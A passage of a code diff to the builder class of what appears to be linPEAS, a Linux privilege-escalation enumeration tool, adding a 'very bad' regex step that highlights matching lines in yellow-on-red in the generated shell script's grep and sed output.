"$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; ' #If just list, just list the file/directory @@ -244,6 +244,7 @@ class LinpeasBuilder: grep_only_bad_lines = f' | grep -E "{frecord.bad_regex}"' if frecord.bad_regex else "" grep_remove_regex = f' | grep -Ev "{frecord.remove_regex}"' if frecord.remove_regex else "" sed_bad_regex = ' | sed -${E} "s,'+frecord.bad_regex+',${SED_RED},g"' if frecord.bad_regex else "" + sed_very_bad_regex = ' | sed -${E} "s,'+frecord.very_bad_regex+',${SED_RED_YELLOW},g"' if frecord.very_bad_regex else "" sed_good_regex = ' | sed -${E} "s,'+frecord.good_regex+',${SED_GOOD},g"' if frecord.good_regex else "" if init: @@ -265,6 +266,9 @@ class LinpeasBuilder: if sed_bad_regex: analise_line += sed_bad_regex + + if sed_very_bad_regex: + analise_line += sed_very_bad_regex if sed_good_regex: analise_line += sed_good_regex